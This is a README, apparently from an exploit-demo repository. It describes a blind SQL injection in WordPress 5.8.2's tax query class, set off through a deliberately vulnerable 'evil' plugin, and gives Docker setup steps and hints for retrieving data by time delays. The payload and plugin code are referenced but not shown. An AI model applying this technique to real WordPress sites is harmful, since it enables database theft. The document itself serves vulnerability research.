## https://sploitus.com/exploit?id=A40C8D1C-7680-5929-84E7-B7A946A7ACF3
This repository demonstrates a vulnerability in WordPress 5.8.2,
in which missing sanitization in class-wp-tax-query.php can, in very specific situations,
allow attackers to perform SQL injection. Note that successful exploitation
requires developers to add vulnerable code to the WordPress instance, in which unsanitized
user input is passed to a $terms variable that is used to construct a SQL function.
See evil.php in the included "evil" plugin, and the lack of sanitization of the $terms variable
in get_sql_for_clause in class-wp-tax-query.php.
The vulnerable/malicious plugin is located at src/wp-content/plugins/evil/evil.php.
Demonstration steps
sudo docker-compose up
follow the installation instructions at localhost
active the wordpress plugin in the admin panel (it's titled evil plugin)
Send the request in newexploit_req.txt to the newly created server. You should get a time delay.
Note that the vulnerability demonstrated by the plugin is a blind sql injection, so if you want to try data retrieval you'll need to retreive data either via time delays or errors.
Debugging notes
sudo service docker restart if name resolution failure occurs
adjust xdebug.client_host=172.19.0.1 in xdebug.ini as needed